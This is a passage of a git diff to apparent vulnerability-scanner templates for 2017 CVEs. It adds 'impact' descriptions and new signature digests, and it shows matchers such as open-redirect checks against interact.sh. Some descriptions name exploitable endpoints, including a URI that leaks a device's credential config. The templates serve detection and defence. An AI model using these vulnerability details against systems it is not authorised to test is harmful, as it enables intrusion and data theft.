   description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks.
+  impact: |
+    An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of the Phoenix Framework.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
-# digest: 4a0a00473045022100fbc64d48639e801ba44c18dc1325a7d872ddbd3e2b0d2bc36b1dd7f0a36b9bff0220462e445c4a078c41b3403b39f015f54dd2d3a21556562a51763b3b80d7938fc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022061d920e4cf0cc267f5422bb075fb85b8a57687a359570425759dc88b3864306702200595972f0d206f6a97d8314e7c9dddcf854272edd6d96c902e7d18d6f88e8133:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml
index 5a566eaed5..ee195221b2 100644
--- a/http/cves/2017/CVE-2017-1000170.yaml
+++ b/http/cves/2017/CVE-2017-1000170.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
+  impact: |
+    Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution.
   remediation: |
     Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022046566273234bf6caf55c2e12b37d6e9f46394b87962e6ec73df1ad568825497602207fc5466568fcbdb3783cbd890e4fb5fd7e41f5163b1d8af5f2db9e9a88653f41:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100de5bd7b4fece1a9f461df86fbe6bee5fb4e2c4bc26b5f4b2ff803cc8f4fd3302022100dcf0958417769fd56c3b8e04540f8ae5bd0553b4575468f3934ae4b03238cded:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml
index 9525b9ec00..2cf9fa10b4 100644
--- a/http/cves/2017/CVE-2017-1000486.yaml
+++ b/http/cves/2017/CVE-2017-1000486.yaml
@@ -5,6 +5,8 @@ info:
   author: Moritz Nentwig
   severity: critical
   description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.
   reference:
@@ -43,4 +45,4 @@ http:
         part: header
         words:
           - 'Mogwailabs: CHECKCHECK'
-# digest: 490a00463044022002e314cfaca7fbad336a98e81d9f0301405fe12ec2d85b1b60e885a410db60d102203dcb057232a516b0bff1eafd5da9d0ea916ab191da150aa02d0889516423924f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201e438adbd2f0f976434a17c20b85ec68d50891622dffa3c1fc66e73fb8a175fd022100ac9295f7820226829d4c0a2fc6e91afd23b1d1a64d2aac21d0e8ceb9d383185e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml
index 995d6cec64..24fa96063c 100644
--- a/http/cves/2017/CVE-2017-10075.yaml
+++ b/http/cves/2017/CVE-2017-10075.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches provided by Oracle to fix this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220473eb381d888be142655f8bc72c44faabfaae5255c3b7e925f7f303d1e9987800220741bf34f88e88d91fd7782b8b7bbdc382cee6b230bfcd34a96b79b38590593b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022050ddeab295f0f5b5ff2229fef47015ce60eb9b662eacbf82e4dcb694ece4de6502202f1447ddd180742a71065e40076b599f04cf262abb649f58dde5c639bb869416:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml
index 96c51bcd7d..0f5c302d38 100644
--- a/http/cves/2017/CVE-2017-10271.yaml
+++ b/http/cves/2017/CVE-2017-10271.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server.
   remediation: |
     Apply the latest security patches provided by Oracle to fix this vulnerability. Additionally, restrict network access to the WebLogic server and implement strong authentication mechanisms.
   reference:
@@ -105,4 +107,4 @@ http:
           - body == "{{randstr}}"
           - status_code == 200
         condition: and
-# digest: 4b0a00483046022100a50a9fe5ab31b66ce65d3212b8e06c7942e5486daf1f1cdea73182f55500e472022100fba14ba0b63db30bbb8aeec39ce576742052bc2b3e8002c90fa4e5a772b8a588:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206f8a3318a5178a1d1d2ca24d6d105aa876b6dd510d9149d5df85dba577aca50c022100ebbb5d8cfb0f8e7b98248f30d09f63424829c1cefc596451f1844a9a34b3f10e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml
index 2b395e8634..f975386b4a 100644
--- a/http/cves/2017/CVE-2017-10974.yaml
+++ b/http/cves/2017/CVE-2017-10974.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Yaws 1.91 allows unauthenticated local file inclusion via  /%5C../ submitted to port 8080.
+  impact: |
+    The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to a patched version of Yaws or apply the necessary security patches.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100dee066eb4122385b57e6ed1da27819aca19a9d503641f092b847b25400065c87022100eba9aa31fc122276dfa41385bff232da6cff2ef0671cb594f3ce13c4268d5999:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e2504e94cb3256d100e4734abc2ba9a84bb35c72e8615dc357f3953b7d27f4fa022100baeb2dfd9a3fdcf5722eb171c77da94ab1da7e6d556ad4bbf50515b0b5fc93f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml
index 7f63e4c678..e0bbec12a0 100644
--- a/http/cves/2017/CVE-2017-11165.yaml
+++ b/http/cves/2017/CVE-2017-11165.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive data, potentially compromising the confidentiality of the system.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022059ed64c6cdf3c80232c0d929b48e34ad528175e2f7de3e8e0d8b2d5f3cfe914a022100def77f94ad441f708244770ac084bf4fe14b7255a86b034efa19843d59c96328:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022019205ca83cef3686b86bdea2d1d6d55fca0a091cf4d20750bc9ac7a855c782d1022100cdb0e22a20379b83984d0f9262a93b39f8e4def23b5bb88ced1496d67433d7e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml
index 9e505cca66..0891277a11 100644
--- a/http/cves/2017/CVE-2017-11444.yaml
+++ b/http/cves/2017/CVE-2017-11444.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: "Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array."
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Upgrade Subrion CMS to version 4.1.5.10 or later to mitigate this vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c687b61635bc5930f816499ef56eac71580e9474d9848316cf15764bf9ac7f34022100a3da2b81578462c00feb4e4bfd5844ed1592eb84e812bbe37ba51a09e4868baa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008eff8bb67d6080ac5ee0969d2417d4ddedb9265dc1ceebeaf37e63f14e89084002206841f4b09ccd220bb86a61610bb96f6e672d3ff3902b9cc22fc59865c1bdca0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml
index ca8234c61f..1b63024fa1 100644
--- a/http/cves/2017/CVE-2017-11512.yaml
+++ b/http/cves/2017/CVE-2017-11512.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage.
   remediation: |
     Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches.
   reference:
@@ -43,4 +45,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 4a0a0047304502206efcae3ac42238f6b1ad19447bf0c214516282926de4b26252554b64730fbc0c022100d26f6372b8542b2ec05ee13e65b9077c1c2d6ebbc2498ceb609c0f765e6ee1e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009a11bee4341c7d482f5babbe13b08d1d8bf6f0228f61c299529ea583a585bfb2022100c38b3339d4f136c7b103e46cf1790e1bff89046995ac16d1a1206b25d655f46f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml
index c9025874c7..f0b55d14ce 100644
--- a/http/cves/2017/CVE-2017-11586.yaml
+++ b/http/cves/2017/CVE-2017-11586.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
         part: header
         regex:
           - 'Refresh:(.*)url=http:\/\/interact\.sh'
-# digest: 4a0a00473045022100e8637f367b70e444ea391c42896ccf9f3bab28efbc656f72968145b0d5d32bfe02203a8bf9c4e5aa784b08a45d761fac731fe7aadc7aab7339940b98d4232149dc21:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200a288e1dfe635d530db31748963e18fb235ec812796d8fea798f66b4e7da6f9c02210087716d81e3cbea58b9591e7cbf94adfdbcb55989feead96259dc70f6e5e35f8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml
index 4878dcc24d..f71e5d3ec6 100644
--- a/http/cves/2017/CVE-2017-11610.yaml
+++ b/http/cves/2017/CVE-2017-11610.yaml
@@ -5,6 +5,8 @@ info:
   author: notnotnotveg
   severity: high
   description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Apply the latest security patches or disable the XML-RPC server if not required.
   reference:
@@ -63,4 +65,4 @@ http:
           - "<methodResponse>"
           - "<int>"
         condition: and
-# digest: 4a0a0047304502200e1c758f8af3b185de6c1eabbce1e4c8ff48fc9f735165c9e5fbf7d4773d6c6b022100a2ffae5cc927593094e883d7cb05c8d97fa23bbd3bcdafe4f0c2362a01ed0f86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204ef086474fdf3360ffea88f485401d4881f41840d507f8f85b7c57f278851e9602200bf5729901fca3960b3c5da15dce3fd420fedcd63830b0be8a46bf12317c5b1c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml
index f9c9967f5c..8701e5c9e5 100644
--- a/http/cves/2017/CVE-2017-11629.yaml
+++ b/http/cves/2017/CVE-2017-11629.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b648034bbb741fbbdab76b46837240b7ec0a80c978b8395bc3f8ba086c08c4c302203ad707941844a25d6103f0697998f0ba32382e8748d3e98ac0c0d1ec0bb90596:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c81fea3ebed14c3fd70428d6e9ebbd8af684e80acdce8a8bdf5f930a5e5cf8a7022100f233ec900fb928a1d116b54b2b5f954720aabf9289325db0217ceb2ccdad2658:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml
index d7c3537b0c..00f0b979df 100644
--- a/http/cves/2017/CVE-2017-12138.yaml
+++ b/http/cves/2017/CVE-2017-12138.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022042d21d495469a2cdc93551e25c6d7a996124288651217a4a0a66101fa1127c5a02210090750895d799d1d2d6d277aaee2b8862824cbdcd2065f115cd6cae4e0c317734:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa67c1c9e88397fd853139dbf1cf93c9db6d998bc497150038c42f861347335c022100f2d652a8676912e3eaf0249b9966b28f683a18d17f60ea69b2db7e419d2f4806:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml
index d98c2171f7..f18f626b3c 100644
--- a/http/cves/2017/CVE-2017-12149.yaml
+++ b/http/cves/2017/CVE-2017-12149.yaml
@@ -5,6 +5,8 @@ info:
   author: fopina,s0obi
   severity: critical
   description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because  the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected server.
   remediation: |
     Apply the latest security patches and updates provided by Jboss to fix this vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
         status:
           - 200
           - 500
-# digest: 4b0a00483046022100c5a8d7d785b7fc8de478ef07ef74dcd47f45c142749daf2b4631d2c4bf529ef1022100ac06bc8685d37d64a1e9d24b909681681aa50d344ea702981ce36addc237d142:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100961026dd21b97de42852865d8eb6aaa1ebb31720de258aebea0d83a1dbbd595d022100a9f2f0d3fcb726ea029f816a68cc1c99d117a3d651a96c66a803b66bc242c625:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml
index 3c74c1e1d5..8508cc091f 100644
--- a/http/cves/2017/CVE-2017-12542.yaml
+++ b/http/cves/2017/CVE-2017-12542.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.
   remediation: |
     Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204c003302d7715f4d7c30328fa9e7a9c01540b2a27ecf48293bbc888db3fa49de0220380d79d47def11781b839e8655f588af244c3a08cfe77a334da6aa359b4c0a7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a3e346c6a6b738d9fb52450d9452caafc3f26834b4e89d9df767b914c5efa0c02210089ea3b0ea81e681b48bb853890215506d457b8ea5f1a435889b6707ffeb66ce8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml
index 7505138950..cf6253daa0 100644
--- a/http/cves/2017/CVE-2017-12544.yaml
+++ b/http/cves/2017/CVE-2017-12544.yaml
@@ -5,6 +5,8 @@ info:
   author: divya_mudgal
   severity: medium
   description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
   remediation: |
     Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220386130f8e942a4e3455a38c2980b391a2b04f492c2712a9a04183905e59a6009022100b92e18a4c85d8537a68fca3d5630476c8ff64c846583fb35b3635ef8c05c0815:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009ba13cf1e72902ee275f6c64e70a38b140fefdc045ec966b97e51bc344a4326a022100b825422e8bf3e1bc8b51128e2b3a870d62954d118b05ea1ad5ce48b8cd1576e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml
index 0704f6679b..5d9570fd9c 100644
--- a/http/cves/2017/CVE-2017-12583.yaml
+++ b/http/cves/2017/CVE-2017-12583.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDK
   severity: medium
   description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220683596bac35536039f20773ecf109c76c8e178d1f037c135e47ed95936bd4dd1022050ab97bf5135e539634f038b6c43866e8a9dac0209d7e9d1e391def5568c7a60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200fa8898e1cf51cd31c5984c45336ece80f13eaeb8be7ba824990411e3382e2c10220221edd6505e87f366ad460007521cfae0cb356c6f80b9aac14426ecb5f7fd9e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml
index 027734ce75..55346d4a7c 100644
--- a/http/cves/2017/CVE-2017-12611.yaml
+++ b/http/cves/2017/CVE-2017-12611.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.
+  impact: |
+    Remote code execution
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d188cf2f02f9c4fdabc65020e1a4b6a07007919eec94ae6f24e918db33e4dd12022100e63fbd24352343f6c19017e86ae21100df4d97fd5c6378eda0293281ed485cd9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022051cf097709453b12f0cc29e773f45c31c2b20072297945baec3738f572736d86022100eaa8fbf9eda6e1e35f8c7656e278984ce520120d8708b9acd39fc5dd1c9b36b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml
index c65cee3585..398bdf9076 100644
--- a/http/cves/2017/CVE-2017-12615.yaml
+++ b/http/cves/2017/CVE-2017-12615.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.
   reference:
@@ -67,4 +69,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203976c11bb605ad5c0f1941c384f3d3d0c70c42e63d1af82b275002833e0cdf68022054a43b54d602a4025b2b1efd35fafaafcdce592f56319b84955d190aea95cc7f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e80d5d21eaa1b74a5c141cd029262af7130c1f34c5b0459e6f24674e7c72ca4d02206226f184519ceb0746fde9a5297b181c8c2b920c0ee57a54f4cbbb7bee9a10bf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml
index 3d513983d7..9074f5f73d 100644
--- a/http/cves/2017/CVE-2017-12617.yaml
+++ b/http/cves/2017/CVE-2017-12617.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server.
   remediation: |
     Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220119141c390b49ed4c9d5cc9b397f2002cfbee8c1889db8b4ff119b16653befa20221009e45e2f700c5f838965ab2b2d945392d13378d689202ccc07fcdb96ca976a429:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022071dd9ceebc684a86c7228090991c25617ba66553c9eec6ee5f11e443ff2547ed0220218ceb7e4518153d87360260c9296f3d59d2c55be49855e35f62e9d2a89f053d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml
index 7927987122..f3d37d4cd4 100644
--- a/http/cves/2017/CVE-2017-12629.yaml
+++ b/http/cves/2017/CVE-2017-12629.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
+  impact: |
+    Successful exploitation of this vulnerability could lead to information disclosure, denial of service.
   remediation: |
     Upgrade to a patched version of Apache Solr (7.2 or higher) or apply the recommended security patches.
   reference:
@@ -49,4 +51,4 @@ http:
         regex:
           - '"name"\:"(.*?)"'
         internal: true
-# digest: 4a0a004730450221009508d98bfcd14ef3d742a1be5863ba58100701dc10cb3827f7f67e65dd88797502200df636f509346d2b892b8b8da770d5a3714c60cdcf1600532b537b15f22ac3dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205ff3b10fb167431b4e908557875123ac30c0ac74a17397bd111623259b056e24022100ac61faf3402994f493e17f6c487d49f3c0b7b1bdca2eacae7394b4d639c677bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml
index 139aa388c8..43623e793f 100644
--- a/http/cves/2017/CVE-2017-12635.yaml
+++ b/http/cves/2017/CVE-2017-12635.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
+  impact: |
+    Remote attackers can exploit this vulnerability to escalate privileges.
   remediation: |
     Upgrade Apache CouchDB to version 2.1.1 or later.
   reference:
@@ -61,4 +63,4 @@ http:
         status:
           - 201
           - 409
-# digest: 4a0a004730450220668cb0008ed69e186b3dac62ae2a1b5b2cf39235b4f8af09f1be4b8a9e5e4704022100d5f6614dda6e2af4941e598113eb6ff43733529271f581287cea171795977914:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022062e948131457520bf5719b89023b98b4fd948ebc16f8fcfaf5fa88628105402102202c73f0347a1ac0f0b49dd102d966e0f21fdf1db2a9b537508c6a12a202ab61c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml
index ad72092f56..cc69e3f2c3 100644
--- a/http/cves/2017/CVE-2017-12637.yaml
+++ b/http/cves/2017/CVE-2017-12637.yaml
@@ -5,6 +5,8 @@ info:
   author: apt-mirror
   severity: high
